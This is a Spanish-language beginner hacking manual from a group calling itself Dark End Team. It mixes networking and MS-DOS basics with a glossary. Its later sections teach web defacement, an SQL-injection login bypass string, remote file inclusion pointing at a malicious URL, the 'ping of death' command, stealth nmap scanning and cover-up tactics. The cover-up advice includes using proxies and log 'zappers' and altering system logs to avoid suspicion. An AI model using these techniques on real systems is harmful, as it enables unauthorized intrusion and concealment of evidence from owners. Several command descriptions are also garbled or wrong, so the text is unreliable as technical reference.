You are on page 1of 28

Guia Hacker By kevin

Irc:/server Darkend.sytes. net


Dark End Team
Dardar73.coconia.net

-En que se basa esta guia


-Que es Un hacker
-Empesando Con el Tema
-Protocolo tcp/ip
-Introduccion a las Redes informaticas
-Puertos
-Introduccion A la shell de windows
-Introduccion a los Comandos Unix
-Aprendiendo Lo basico De Desacing web
-Borrando Nuestras huellas
-Escaneando Sitios.
-d.o.s
-d.d.o.s
-Introduccion A los troyanos
-Introduccion a los Virus
-Idea basica de la intrusion
-Una despedidad
-Dark End Team contacto

1=:En que se basa esta guia.

Weno Principalmente esta guia se basa en la introduccion al mundo


informatico y Al hacking.
He de decir quee sta guia no te convertira en un hacker Ni mucho menos
Esta guia te enseñara
a dar tus primeros pasos en este mundo.
Principalmente esta guia esta enfocada a todo aquel Que de verdad esta
interesado por aprender
si lo Unico que quieres es Robar Una cuenta de correo de otra persona o
Hacerte Con una @ En los
servidores irc.
Sera mejor que no sigas leyendo Esto No es lo tuyo.
He de decir tambien Que esta guia esta enfocada a Los usuarios De
windows Aunque se hablara un poco
Sobre los sistemas Unix.
Ahora Si de verdad Te interesa aprender Leete este manual.

2=: ¿Que es Un hacker?

Principalmente Un hacker no es aquel Que penetra en otros ordenadores o


Roban virtualmente millones accediendo
a los sistemas de un banco.
Un hacker Es una persona Que se interesa mucho por el mundo de los
ordenadores,Y Quiere aprenderr y aprender y no parar
de aprender y ademas le gusta lo que hace.
no creas esa mala influencia que dicen por la television a la prensa
que somos delincuenets informaticos.
Nosotros solo nos interesamos en aprender.
y En el conocimiento.
Hoi en dia Las empresas estan contratando a hackers para que defiendan
sus sistemas.
Tambien hed e decir que Si dicen que somos delincuetes por que mejor se
ocupan
de los asesinatos,Violaciones,Pornografia infantil etc...
Esos si son delitos graves, Nada comparado Con el hacking. Nosotros nos
dedicamos al Conocimiento.
"ESE ES NUESTRO UNICO OBJETIVO"

3=:Empesando con el tema

Bueno despues De todo Ese texto Por fin Empesaremos manos a la obra
Antes he de decir que Nunca Ataques Un sistema Hasta que no tengas Un
nivel.
Super alto en hacking Y para tenerlo No basta con leerese 30 manuales.
eso es cuestion de años Y practica.

4=:Protocolo Tcp/ip

¿que es una direccion Ip?

UnA Direccion Ip es Como un numero que nos identifica a


Sistemas/servidores cuando nos conectamos a internet.
Este numero No puede pasar De 255 Por cada cadena.
una direccion Ip tiene 4 cadenas
ejemplo:
96.56.56.300
Esta ip es erroneo por el 300 Ya que lo maximo numero es 255
Un ejemplo:
85.155.67.87
esta ip si seria correcta.

Bueno El tcp/ip Es el mas usado y Es el correspondient o de algunos


servicios que solemos utilizar Con frecuencia.
telnet ,smtp,Ftp,tftp etc...
Ahora explicare Estos servicios su funcion y como se utilizan

Telnet:- Es Un protocolo de acceso Remoto Host De internet.


en WIn95/98 Se utiliza En modo Grafico Pero Voi a explicar la utilizacion de
telnet
En winxp Y posteriores.
Weno antes que nada He de decir Que es una shell
Una shell es Una parte fundamental de un sistema opertivo Que se encarga
de ejecutar ordenes (Comandos)
Para abrir la shell que viene con windows Basta con IR a
incio/EJECUTAR/cmd.exe
Una ves hay Para iniciar Telnet hacemos Lo sigguiente:
en la shell escribimos Telnet Y le damos a enter.
Una ves dentro aparecera algo asi.

-Cliente Telnet de microsoft


el caracter de escape es ctrl++

Microsoft telnet_

Para acceder A un sitio


Vasta con teclear

open ip puerto

Un ejemplo

Microsoft Telnet_ Open 87.78.89.77 56


En este caso me he conectado al puerto 56 del host/servidor 87.78.89
si no se asigna un puerto en Una conexion se conecta al predeterminado d
de telnet el puerto
"23"
Nota: Un puerto Es un numero Que identifica servicios en Un ordenador.
y Por donde entran y salen datos.

Ftp-

Bueno ftp Es Un protocolo de trasnferencia De archivos, Mui usado la


verdad
Para ejecutarlo Basta con Poner en la shell.
Ftp
y darle a enter una ves dentro aaparecera algo asi

ftp-_

funciona casi igual que telnet De Hecho es como si estuvieramos haciendo


telnet a un host Por el puerto 21
(Puerto por defecto de ftp)

Aora escribiriamos Open

Luego La direccion Ip/host/servidor


y listo.

Nota:Al conectarte a un sitio EL 99,9% De las veces te pedira password


Pero Siempre Hay maneras de burlarlo.
De eso ya se hablara mas adelante

smtp-

Viene De Simple Mail trasnfer Protocol ,o protocolo simple de transferencia


de correo electrónicoy es

un Protocolo de red basado en texto utilizado para el intercambio de


mensajes de correo electrónico entre
computadoras U otros dispositivos.

Tftp-
viene de Trivial File Transfer Protoco

Y es un protocolo de internet Para la carga remota de ficheros.


5=:Introduccion a las redes informaticas

Bueno 1 º Para los mui novatos hay que decir Lo que es una red es tan
simple de definir como
Conjunto de host que intercambian información.
Bueno Y ahora los diferntes tipos de redes locales
* LAN: Red de área Local (Local Area Net)

Redes que abarcan una o varias salas, incluso en diferentes plantas de


un mismo edificio o en edificios cercanos.
* MAN: Red de área Metropolitana (Metropolitan Area Net)

Redes que conectan equipos situados en diferentes puntos de un núcleo


urbano..
* WAN: Red de área Amplia (Wide Area Net)

Redes que incluyen ordenadores de diferentes provincias o incluso


países.

¿Que es una Intranet?

na intranet es una red local que utiliza herramientas de Internet. Se puede


considerar como una internet privada que funciona dentro de una
organización. Normalmente, dicha red local tiene como base el protocolo
TCP/IP de Internet y utiliza un sistema firewall (cortafuegos) que no
permite acceder a la misma desde el exterior.

Bueno Ya esto Basico de Reedes mui mui basico creo que es suficiente.

6=:Puertos

Aunque ya dije antes que era un puerto Lo vuelvo a decir


Un puerto es un numero que identifica un servicio en un ordenador
por los que entran y salen datos.

Bueno aqui os dejo una lista bastante amplia.

echo 7/tcp

echo 7/udp
discard 9/tcp sink null

discard 9/udp sink null

systat 11/tcp

systat 11/tcp users

daytime 13/tcp

daytime 13/udp

netstat 15/tcp

qotd 17/tcp quote

qotd 17/udp quote

chargen 19/tcp ttytst source

chargen 19/udp ttytst source

ftp-data 20/tcp

ftp 21/tcp

telnet 23/tcp

smtp 25/tcp mail

time 37/tcp timserver

time 37/udp timserver

rlp 39/udp resource # resource location

name 42/tcp nameserver

name 42/udp nameserver

whois 43/tcp nicname # usually to sri-nic

domain 53/tcp nameserver # name-domain server


domain 53/udp nameserver

nameserver 53/tcp domain # name-domain server

nameserver 53/udp domain

mtp 57/tcp # deprecated

bootp 67/udp # boot program server

tftp 69/udp

rje 77/tcp netrjs

finger 79/tcp

link 87/tcp ttylink

supdup 95/tcp

hostnames 101/tcp hostname # usually from sri-nic

iso-tsap 102/tcp

dictionary 103/tcp webster

x400 103/tcp # ISO Mail

x400-snd 104/tcp

csnet-ns 105/tcp

pop 109/tcp postoffice

pop2 109/tcp # Post Office

pop3 110/tcp postoffice

portmap 111/tcp

portmap 111/udp

sunrpc 111/tcp

sunrpc 111/udp
auth 113/tcp authentication

sftp 115/tcp

path 117/tcp

uucp-path 117/tcp

nntp 119/tcp usenet # Network News Transfer

ntp 123/udp ntpd ntp # network time protocol (exp)

nbname 137/udp

nbdatagram 138/udp

nbsession 139/tcp

NeWS 144/tcp news

sgmp 153/udp sgmp

tcprepo 158/tcp repository # PCMAIL

snmp 161/udp snmp

snmp-trap 162/udp snmp

print-srv 170/tcp # network PostScript

vmnet 175/tcp

load 315/udp

vmnet0 400/tcp

sytek 500/udp

biff 512/udp comsat

exec 512/tcp

login 513/tcp
who 513/udp whod

shell 514/tcp cmd # no passwords used

syslog 514/udp

printer 515/tcp spooler # line printer spooler

talk 517/udp

ntalk 518/udp

efs 520/tcp # for LucasFilm

route 520/udp router routed

timed 525/udp timeserver

tempo 526/tcp newdate

courier 530/tcp rpc

conference 531/tcp chat

rvd-control 531/udp MIT disk

netnews 532/tcp readnews

netwall 533/udp # -for emergency broadcasts

uucp 540/tcp uucpd # uucp daemon

klogin 543/tcp # Kerberos authenticated rlogin

kshell 544/tcp cmd # and remote shell

new-rwho 550/udp new-who # experimental

remotefs 556/tcp rfs_server rfs# Brunhoff remote filesystem

rmonitor 560/udp rmonitord # experimental

monitor 561/udp # experimental

garcon 600/tcp
maitrd 601/tcp

busboy 602/tcp

acctmaster 700/udp

acctslave 701/udp

acct 702/udp

acctlogin 703/udp

acctprinter 704/udp

elcsd 704/udp # errlog

acctinfo 705/udp

acctslave2 706/udp

acctdisk 707/udp

kerberos 750/tcp kdc # Kerberos authentication--tcp

kerberos 750/udp kdc # Kerberos authentication--udp

kerberos_maste r 751/tcp # Kerberos authentication

kerberos_maste r 751/udp # Kerberos authentication

passwd_server 752/udp # Kerberos passwd server

userreg_server 753/udp # Kerberos userreg server

krb_prop 754/tcp # Kerberos slave propagation

erlogin 888/tcp # Login and environment passing

kpop 1109/tcp # Pop with Kerberos

phone 1167/udp

ingreslock 1524/tcp
maze 1666/udp

nfs 2049/udp # sun nfs

knetd 2053/tcp # Kerberos de-multiplexor

eklogin 2105/tcp # Kerberos encrypted rlogin

rmt 5555/tcp rmtd

mtb 5556/tcp mtbd # mtb backup

man 9535/tcp # remote man server

w 9536/tcp

mantst 9537/tcp # remote man server, testing

bnews 10000/tcp

rscs0 10000/udp

queue 10001/tcp

rscs1 10001/udp

poker 10002/tcp

rscs2 10002/udp

gateway 10003/tcp

rscs3 10003/udp

remp 10004/tcp

rscs4 10004/udp

rscs5 10005/udp

rscs6 10006/udp

rscs7 10007/udp

rscs8 10008/udp
rscs9 10009/udp

rscsa 10010/udp

rscsb 10011/udp

qmaster 10012/tcp

qmaster 10012/udp

¿Que es udp?

Protocolo de redes, no orientado a conexión y no confiable (usado para


transmisiones de voz y video), que forma parte del conjunto de protocolos
de TCP/IP.

Bueno ya con esto Sabras lo que son los puerttos Tcp/udp

7=:Introduccion A la shell de windows

Bueno aqui lo que voi a Dar a conocer Son sus comandos Basicos Mas
usados Para la administracion del sistema
y porque crees que explico esto?

Pues simplemnete porke Si te haces con La shell de un sistema Como


sabras manejarlo Si corre Bajo win?
mas adelante se explicaran Los comandos Unix.
alla van los comandos

MSD
Acrónimo de Microsoft Diagnostics (diagnósticos de Microsoft) Nombre que
recibe la aplicación entregada en las últimas versiones del sistema operativo
MS-DOS, que posibilita al usuario la obtención de información sobre la
configuración de su equipo.
FORMAT (comando externo)
Format: comando del sistema operativo MS-DOS cuya misión es formatear
las unidades de almacenamiento (discos duros y disquetes).
Formatear es preparar un disco o disquete para trabajar o almacenar datos.
Este tiene como objetivo dar formato al disco del driver. Este crea un nuevo
directorio raíz y tabla de asignación de archivos para el disco. También
puede verificar si hay factores defectuosos en el disco y podrá borrar toda la
información que este contenga.

CLS (comando interno)


Comando del sistema operativo MS-DOS cuya misión es limpiar la pantalla.
Una vez limpia la pantalla coloca el cursor en la parte superior izquierda de
la misma.

CD (comando externo)
Comando de los sistemas operativos DOS y UNIX que nos sirve para
cambiar de escritorio.

MD
Crea un directorio

ROOT
Es un sistema operativo jerárquico de archivos refiérese al primer escritorio
respecto al cual todos los demás son subdirectorios .

DISKCOPY (comando externo)


Nos permite hacer una copia idéntica de un disquete a otro, pertenece al
grupo de los comandos externos.

Comandos Internos
Son aquellos comandos cuyas instrucciones son cargadas a la memoria
RAM. Estos comandos no necesitan la presencia del disco de sistema
operativo.

Entre ellos encontramos:


COPY CLS
DEL O ERASE DIR
TYPE DATE
RENAME MD
TIME VER

Comandos Externos
Estos comandos necesitan mucha capacidad de memoria para mantenerse
dentro de ella al mismo tiempo, por lo tanto son grabados en el disco, y
podemos ascesarlos cuando sea necesario. Son llamados externos porque
estos están grabados fuera de la memoria RAM.

Entre estos están:


CLRDSK DISP COMP
DELTREE TREE
DOSKEY RESTORE
FORMAT DISK COPY
ATTRIB LAVEL
FAT (file allocation table) (comando interno)

Tabla de asignación de archivos. Es la parte del sistema de archivo DOS y


OS/2 que lleva la cuenta de donde están almacenados los datos en el disco.
PROMPT (símbolo del sistema) (comando interno)
Este cambia la línea de comando, o sea, se emplea para cambiar la
visualización de la línea de comando.

PATH (comando interno)


Especifica el directorio cuya estructura del directorio desee preguntar.
Erase o Delete (comandos internos)
Este comando se utiliza para suprimir, borrar o eliminar uno mas archivos
de un disquete o disco duro. Otro comando que tiene la misma función es el
comando interno ERASE.

COPY (comando interno)


Copia uno o más archivos de un disquete a otro. Este comando también
puede emplearse como un editor de texto.
ATTRIB (comando interno)
Brinda atributos a los archivos. Despliega o cambia los atributos de los
archivos.
Ej.
TH- atributo de invisibilidad
R-atributo de solo lectura
T-activa un atributo
M-desactiva un atributo

XCOPY
Comando que permite hacer copias del disco duro o entre disquetes
distintos formato. XCOPY lee todos los ficheros que una memoria RAM y a
continuación lo escribe en un disquete.

VER (comando interno)


Su objetivo es visualizar la versión del sistema operativo en el disco.
Despliega información de la versión del DOS que esta operando la
computadora.
VOL (comando interno)
Tiene como objetivo mostrar el volumen del disco y su numero de serie si
existen.

DOS KEY (comando externo)


Nos permite mantener residente en memoria RAM las órdenes que han sido
ejecutadas en el punto indicativo.

PRINT
Comando que nos permite imprimir varios ficheros de textos
sucesivamente.

MIRROR
Al grabar cualquier archivo en Array de unidades en espejo el controlador
envía simultáneamente copias idénticas del archivo a
cada unidad del array el cual puede constar únicamente de dos unidades.

BACK UP (comando externo)


Ejecuta una copia de seguridad de uno o más archivos de un disco duro a
un disquete.

RESTORE
Este comando restaura los archivos que se hagan hecho copia de seguridad.

BUFFERS
Son unidades de memoria reservadas para conservar informaciones
intercambiadas con las computadoras.

SCANDISK
Sirve para comprobar si hay errores físicos y lógicos en el computador.

SLASH
Comando que cierra el directorio hacia la raíz.

BACK SLASH
Comando que pasa de un directorio a otro principal.

CONFIG. SYS
Copia los archivos del sistema y el interpretador de comandos al disco que
especifique.

AUTO EXE BAT


Es el primer fichero que el MS-DOS ejecuta.

UNDELETE
Proporciona una proporción de distintos niveles para ficheros borrados.

UNFORMAT
Comando que permite reconstruir un disco recuperando así toda la
información que contenga.

DIR
Sirve para ver los archivos, directorios y subdirectorios que se encuentran
en el disco duro o en un disquete.

COMADINES
Son caracteres que facilitan el manejo de los comandos Ej.
?- un carácter
*- un grupo de caracteres

F DISK
Permite crear varias peticiones en un disco duro y seleccionar, cual de ellas
será la partición, es simplemente una división del disco duro que el MS-DOS
trata como un área individual de acceso.

LABEL (comando externo)


Etiqueta el disco. Una etiqueta es el nombre de un dato, archivo o
programa.

SYS (comando externo)


Transfiere los archivos de sistema de dos ocultos para hacer un disquete
que tenia para inicial.

TIME (comando interno)


Tiene como objetivo visualizar la hora del sistema o ejecutar el reloj interno
de la PC.

DATE (comando interno)


Permite modificar y visualizar la fecha del sistema.

DELTREE (comando externo)


Usado para borrar un directorio raíz no importa que contenga subdirectorios
con todos sus contenidos.

TREE (comando externo)


Su función es presentar en forma gráfica la estructura de un directorio raíz.

TYPE (comando interno)


Visualiza el contenido de un archivo Desde la línea de comando. O sea las
informaciones que posee un archivo en su interior.
EDIT
Inicia el editor del DOS, para trabajar con archivos ASCII.

REN (rename)
Renombra uno o más archivos, no se puede especificar otro disco o ruta
para el o los archivos.

RD (rmdir)
Remueve o borra directorios, para borrar el directorio debe estar en blanco.

5. Aplicaciones

Buscar ayuda
Podemos obtener ayuda de un comando determinado, introduciendo el
comando y a continuación /?. Por ejemplo: dir /? Esto nos sacara la ayuda
del DOS sobre este comando.

Limpieza de pantalla
Simplemente se teclea en cualquier directorio que se encuentra: c:\cls y se
pulsa enter.

Formatear un disquete de 1,44 MB


Nos situamos en la ruta correspondient e por ejemplo C:\Windows. C:\>
Tecleamos Format a: y pulsamos la tecla enter, seguimos los pasos y
presionamos enter.

Formatear un disco duro


Se siguen los mismos pasos que para formatear un disco de 1,44 MB pero
esta vez con otra dirección, ejemplo nos situamos en C:\Windows. C:\ >
tecleamos Format c: presionamos enter, y se siguen los pasos.

Crear directorios
Tecleamos MD [unidad\ruta\]<nombre>, por ejemplo: nos situamos en
C:\> escribimos md Alumno pulsamos enter, ya se creo el directorio
alumno, pero si deseamos crear un árbol, entonces se tendrá: c:\md
alumno\sistemas y pulsamos enter, c:\md alumno\sistemas\arquitectura y
pulsamos enter, ya se crea el árbol.
Existe otra forma de crear árboles: c:\>md alumno y pulsa enter, se crea el
primer directorio, luego se abre el directorio con C:\>cd alumno, allí se
escribe C:\>alumno>md sistemas y se pulsa nuevamente enter, y así se
seguirá hasta completar el árbol a crear.

Mostrar o Cambiar de nombre del directorio


Nos ubicamos en algún directorio: c:\, a continuación tecleamos C:\>cd
alumno y pulsamos enter.

Borrar un directorio
Tecleamos C:\>rd alumno y pulsamos enter.

Ver el contenido de un archivo


Nos ubicamos en el directorio en que se encuentra el archivo que deseamos
ver, Supongamos que se encuentra en la unidad E:\, tecleamos: C:\>type
e:\arquitectura.txt y pulsamos enter.

Crear o modificar un archivo de texto


Tecleamos C:\>edit C:nuevotexto.txt /H y pulsamos enter, visualizaremos
la pantalla del editor de texto, se podrá entonces editar y guardar el
archivo.

Borrar un archivo
Podemos utilizar varios comandos para borrar archivo, por ejemplo: C:\>del
nuevotexto.txt, o C:\erase nuevotexto.txt
Podemos hacer uso de los comodines * e ?
Si queremos eliminar todos los archivos con extensión .EXE tendremos:
C:\DEL C:\alumnos\*.EXE; Si queremos borrar todos lo archivos del
directorio tendremos C:\DEL C:\alumnos\*.*

Cambiar de Fecha del Sistema


Tecleamos Date, por ejemplo: C:\>Date y pulsamos enter; tendremos: La
fecha actual es Mié 03/09/2003 Escriba la nueva fecha (dd-mm-aaaa): Si
desea cambiar la fecha sólo escribe la fecha sino solo presiona enter.

Cambiar la Hora del Sistema


Se siguen lo mismos pasa que para cambiar la fecha, ejemplo: C:\>Time y
presiona enter, tendremos: La hora actual es 10:54:08.82a Escriba la
nueva hora, si desea cambiar escribe la hora sino solo presiona enter.

Visualizar los archivos y sub-directorios del directorio actual


Si queremos ver los todos los archivos con extensión .EXE tendremos:
C:\>dir *.EXE, si desea ver todos los archivos ordenados en columnas de
tendrá: C:>dir *.EXE /W

8=:Introduccion a los Comandos Unix

Bueno Antes que nada Voi a explicar lo que es unix


unix es un Sistema operativo multitarea y multiusuario.

Que Lo encontraras en muchos servidores de internet Ya que Es mui estable


Para el mantenimiento de servidores.

Como son demasiados Pues os dejo Un link donde os explica todo El


funcionamiento de la consola de linux

http://www.foromsn.com/index.php?
Ver=Mensaje&Id=41902&WebOrigen=1

9=:Aprendiendo Lo basico De Desfacing Web.

Bueno antes que nada al quere desfacer Un host Hay que Sacar Toda la
informacion posible
Una de las teknikas Es Probar Si tiene Servidor FTP ANONYMOUS
user:Anonymous
pass:
enter
acces granted

Y una ves dentro Buscar El exploit Para esaa version Del servidor Y Lograras
El admin.

Ahora Explicar Otros BUGS que Son en modo Grafico.

Html Inyection:

Bueno este bug Es uno de los mas aprecidos Y la verdad suelen estar sobre
todo en foros/blogs/O SITIOS donde se puedan
dejar comentarios.
Para probar este Bug Ponemos en el mensaje <h2>Chevere! Y si nos damos
Cuenta de que es mas grande que el de los demas pos yuju.
es vulnerable Ya todo Pasa a vuestra imaginacion Y destresa.

sql Inyeccion:
Bueno esta tecnica Os Voi a explicar Como se usa pero No por que funciona
asi
Ya que para eso necesitas saber un poco de programacion SQL bases de
datos.

Bueno En los sitios Donde Nos ponen un Panel de administracion Donde nos
pida Login
y password

Existe Una forma de burlarlo Con SQL inyeccion


user:elquequieras
pass:"x) OR '1'='1'"

Y wala accedes :O
Pues Es un error En la comprobacion de la base de datos De los datos
entrantes.
Seguramente Esa inyeccion no te funcione en todos sitios para cada version
hay una inyeccion
Buscalas tu y muevete un poquito

Y aqui Os dejo dos tecnicas mas Escritas Por Un buen amigo De mi foro.

-poyo-
RFI

Remote File Inclusion, o inclusion de archivos remotos. Es todo atake que


incluye el codigo, mediante un descuido que permita ejecutar contenidos de
un archivo remoto..

Ejemplo:
los includes en muxas pags, sin restricciones y asignados a variables,
permiten incluir archivos remotos y los ejecutan:

en la pag: htttp://dominio.com/index.php?url=principal.htm

por ejemplo es asi:


$url= _POST["url">;
...
include($url);
si modificamos ese valor a http://url_del_codigo_malicioso

ejecutaria el codigo malicioso a menos que tenga una limitacion.

Brute Force
Llamamos brute force al hecho de entrar a las bruscas, a lo bruto a un site.
La idea seria, mediante un programa(ya que no creo que alguien sea tan
stupid de ponerse a hacerlo a mano) probar con todas las contraseñas
posibles hasta pegarle.. desde la A hasta la ZZZZZZZZ incluyendo @#ÃÂ
¢Ã¢â‚¬Å¡Ã‚¬ ¬123456789ABCDEFGHIJKLMNñOPQRSTUVWXYZ y todos
los caracteres posibles segun corresponda..

Ahora el brute force ya ta muy quemado, las mejores protecciones que usan
son las de poner un minimo de caracteres, haciendo que la posibilidad de
contraseñas a provar sea mas grande..(la posibilidad es de Cantidad de
caracteres posibles[A-Z;0-9;caracteres raros> elevado a la potencia del
largo de caracteres del password[minimo de 6 en hotmail por ejemplo>) y
la otra proteccion es la de dejar como maximo 20 intentos y luego se
bloquea la cuenta lo de lso 20 en hotmail, en otros sites son menos
piadosos y te dan 3

Poisoning

Llamamos hackeo por poisoning al hackeo donde se consige la autorizacion,


envenenando(de aqui el nombre) el contenido de los datos, las coockies por
ejemplo. Es decir, mediante un envenenamiento de las cookies,
conseguimos ejecutar el codigo que queremos
Como envenenar las cookies?? pues con un simple programa como el
iecv(Internet Explorer Cookies Viewer [Visor de Cookies de IE>), en Opera
Tools->Advanced->Cookies tienes un editor incluido y en Firefox no
recuerdo si viene sola o hay que bajar un plugin de mozilla.org, pero en
Herramientas-> Cookies Editor

El codigo a poner al envenenar dependera segun la web, para sacar este


codigo necesitas conocer cosas sobre la progamacion de la pag, por lo que
por lo general son comunes en sistemas de codigo libre como PHP Nuke,
BB, etc..

borrando Nuestras huellas=:

Bueno seguramente este es una de las cosas mas importantes de aprender.


explicare 3 formas Mui utiles

Servidores Proxies
zappers
Manualmente.

servidores proxies:

Son servidores que interactuan como puente entre tu conexion Y la remota.

Un ejemplo:

Tu makina:SERVIDORPROXIE:host

Por ejemplo al conectarme al google con un proxie seria algo asi.

MIMAKINA====Servidor proxie===Google.es

Entonces QUEDARA MARCAKA


la ip del proxi y no la mia.
existen 3 tipos de proxies pero yo explicare 2
ANONIMOS y MUI ANONIMOS
los anonimos ocultan tu ip pero se sabe que se esta usando un proxie en
cambio Un proxie super anonimos
oculta que se usa un proxie.

zappers:
Son programas que hacen tu trabajo de borrar huellas al entrar en un
sistema
buscalos en google.

Manualmente: Pues Estudiando sistemas operativos..


Se trata de buscar,OBSERVAR,modificar.. esa es la idea.

BUSCA por directorios sospechosos donde creas que puedan aver registres
y no los borres mejor aun modificalos asi quedara menos
soospechoso.

10=:EscaneandO Sitios

Weno Yo principalmente Os recomiendo El nmap (Funciona mejor en Linux)


O el sss
SHADOW SECURITY SCANER

Bueno explicare Como escanear Un site Con el nmap Una ves instalado en
nuestro pc.

En la linea de comandos Escribimos


nmap/?

Y nos saldra Una ayuda.


Pero bueno explicare Lo basico:
nmap -sS host

Porke el parametro -sS ?


porke es modo stealth Y asi evitaremos conplicaciones .

un ejemplo

Nmap -sS 78.45.45.45


Y bueno Una ves visto los puertos... y los resultados tu mismo Buscaras
Algun exploit Para explotar alguna vulnerabilidad .

d.o.s=:

Denial Of service
El objetivo Es tirar A la maquina victima.

Son bastante faciles de realizar se basa en una denegacion de servicios de


peticion.
Existen otros Tipos De ataques DOS
pero yo Voi a explicar Ping flood
Mui bien
Imaginaos que estas cargando Con un libro Y llega uno y te pone 10 mas
pues llega un momento en que tu cuerpo no responde
y los libros se caen.

Eso es mas o menos lo que pasaria en un ataque dos

Antes normalmente el llamadfo ping de la murte Con un simple comando


tirabas un servidor pero ya casi esta parcheado En todos
los sistemas
este era el comando
ping -l 65550 host -t

d.d.o.s=:
Distributed denial Of service
Este Ataque tiene mucho que ver con el anterior Solo que esta implica
varios ordenadores llamados Zombies

UN ESQUEMA SERIA ESTO

tumaquina===Zombie1====zombie2===zombie3=====zombie4===By
tes/paquetes=====Victima

Introduccion A los troyanos=:

Un troyano es a un virus informático o programa malicioso capaz de


alojarse en computadoras y permitir el acceso a usuarios externos, a través
de una red local o de Internet, con el fin de socavar la información.
Principalmente te abre una puerta trasera Poniendote Un puerto en escucha
esperando conexiones y una ves conectado el atakante tiene acceso al
sistema

El mas famoso es el sub seven.

introduccion a los virus=:

Un virus es un Programa que se duplica a sí mismo en un sistema


informático incorporándose a otros programas que son utilizados por varios
sistemas.Progr ama que se duplica a sí mismo en un sistema informático
incorporándose a otros programas que son utilizados por varios sistemas.

Siempre con malas intenciones.

Idea basica de la intrusion=:

Colocare Una idea basica de la inutrsion... con un pekeño eskemita..

sakar informacion del sistema.


---------------------------------------------------------
Buscar Sus Vulnerabilidad es
----------------------------------------------------------
consegir acceso
---------------------------------------------------------
ganar privilegios de administrador
-------------------------------------------------------------
borrar Nuestras huellas
-----------------------------------------------------------
Poner Un snifer.

Una despedidad=:

Bueno Una despedida a todos, Este manual es muuuuuuuuuuy BASICO a


todos los expertos... aqui no encontraran nada nuevo.. esto es pura basura
que yo creo que hasta un lammer podria saber...
espero que les haiga gustado
Bueno .

Dark End Team contacto=:

Antes que nada dar Un saludo a me team Dark End


Miembros:
Kevin
statik
heliosz
sint
yn_tux
demony
hoax

Contactanos:
IRC:darkend.sytes. net
canales: ·#hacking #darkend #linux

Para contacto personal Con migo

Web de darkend:dardar73.cocon ia.net


foro darkend:Darkend.sytes. net

Kevin
saludos
DaRKEND==

Pequeño glosario Hacker

A continuacion te voy a contar el significado de varias palabras relacionadas


con el mundo hacker y underground en general.

Boxes :Aparatos electrónicos o eléctricos cuya finalidad es el phreaking. Las


más conocidas son:
Bluebox : Para llamar gratis.
Redbox : Emula la introducción de monedas en teléfonos públicos.
Blackbox : El que llame a un teléfono con este dispositivo no paga la
llamada.

Carding :
Uso fraudulento de tarjetas de crédito o sus números pertenecientes a otras
personas. Ello incluye la generación de nuevas tarjetas de crédito.

Cracker :
Un individuo que se dedica a eliminar las protecciones lógicas y fisicas del
software. Normalmente muy ligado al pirata informatico puede ser un
hacker criminal o un hacker que daña el sistema en el que intenta penetrar.

Crackeador o crack :
Término muy de moda gracias al asunto de la "Página del Jamón y el Vino".
Son programas que se utilizan para desporteger o sacar los passwords de
programas comerciales. Pudiendo utilizarse éstos como si se hubiera
comprado la licencia. Quienes los distribuyen son altamente perseguido por
la BSA.

El gran Hermano :
En el mundo del Hacking se conoce por este término a cualquier empresa
poderosa que intenta controlar el mercado y el mundo de la informática. En
este estado podríamos colocar a IBM, Microsoft, Telefónica, etc. El brazo
ejecutor del gran hermano como muchos habrán adivinado, es la BSA.

Hacking :
Es cunado se entra de forma ilegal y sin el consentimiento del propietario en
us sistema informático para obtener información. No conlleva la destrucción
de datos ni la intalación de virus. También lo podriamos definir como
cualquier acción encaminada a conseguier la intrusión en un sistema
(ingenieria social, caballos de troya, etc.)

Hacker :
Cualquier persona que se dedica a hacer hacking. Debe ser bastante bueno
con los ordenadores (como minimo).

Lamer :
Principiante en el mundo del hacking que se las da de listo o que copia,
descaradamente, el trabajo de otros hackers. Cuando se les descubre se les
desprecia y se les expulsa del circulo en el que se han introducido.

Pheaking :
Todo lo relacionado con el uso del teléfono o servicios telefónicos de forma
gratuita. También incluye la modificación o intervención de las líneas
telefónicas y las modificaciones de aparatos telefónicos con el fin de
comunicarse gratuitamente.

Pirata informático :
Es un delincuente informático que se dedica a la copia y destribución de
software ilegal. Este software puede ser comercial crackeado o shareware
registrado. También es otro nombre que reciben los crackers, no confundir
con los hackers.

VIRUSES o VII :
Textos sobre virus. Normalmente se incluyen información acerca de como
hacerlos y como protegerse de los mismos.

Warez :
Programas comerciales ofrecidos gratuitamente a través de internet.
Periodicamente aparecen por internet (en la News o IRC) unas listas con
inforación de servidores FTP o WWW donde se encuentran programas de
estas caracteristica s. Piratería informática.

Ahora unos términos intrínsicamente relacionados con el Hacking :

Administrador, SysOp, Root :


Individuo que se encarga del mantenimiento de un sistema informático y
tiene el control total sobre el mismo. También se encarga de la seguridad.

Backdoor :
Puerta trasera de un sistema informático, un mecanismo del software que
permite entrar evitando el método usual.

Bug, Hole :
Agujero. Se trata de un defecto en el software (normalmente el S.O.) que
permita la intrusión de los hackers.

Caballos de troya :
Programa que se queda residente en un sistema informático y falicita
información sobre los que ocurre en el mismo (passwords, logins, etc.).
También es aplicable a programas que parecen normales y al ejecutarse
despiertan un virus que se introduce en el sistema.

Cortafuego, firewall, bastión :


Software y hardware de seguridad encargado de chequear y bloquear el
tráfico de la red hacia un sistema determinado.

Crackeador :
Programa que se emplea para extraer los passwords encriptados del archivo
de passwords. Para ello se intenta desencriptarlo o se prueban múltiples
combinaciones hasta encontrar la adecuada.

Exploit :
Método de utilizar un bug para penetrar en un sistema.
Fichero de Password :
Fichero deonde se guardan las claves de acceso a un sistema.

Fuerza Bruta :
Forma poco sutil de entrar en un sistema que consiste en porbar distintos
passwords (contraseñas) hasta encontrar la adecuada. Requiere mucho
tiempo y para ello se emplea un crackeador, se desencripta un fichero
encriptado, se sacan las claves del fichero de passwords empleando las
palabras del diccionario, etc.

Ingenieria social :
Es una técnica por la cual se convence a alguien, por diversos medios, de
que proporcione información útil para hackear o para beneficiarnos.
Requiere grandes dosis de psicologia.

Sniffer y Sniffing :
Un sniffer es un programa que intercepta la información que transita por
una red. Sniffing es espiar y obtener la información que circula or la red.

Tracear :
Seguir la pista a través de la red de una información o una persona. Se
utiliza por las grandes empresas (como Telefónica) para obtener la
identidad de los sospechosos o hackers.

Trashing :
En castellano recoger por la basura. Se trata de buscar en la basura (fisica
o informática) información que pueda ser útil para hackear.

War Dialer, Discador :


Programa que escanea las líneas de teléfonos en la búsqueda de modems.

You might also like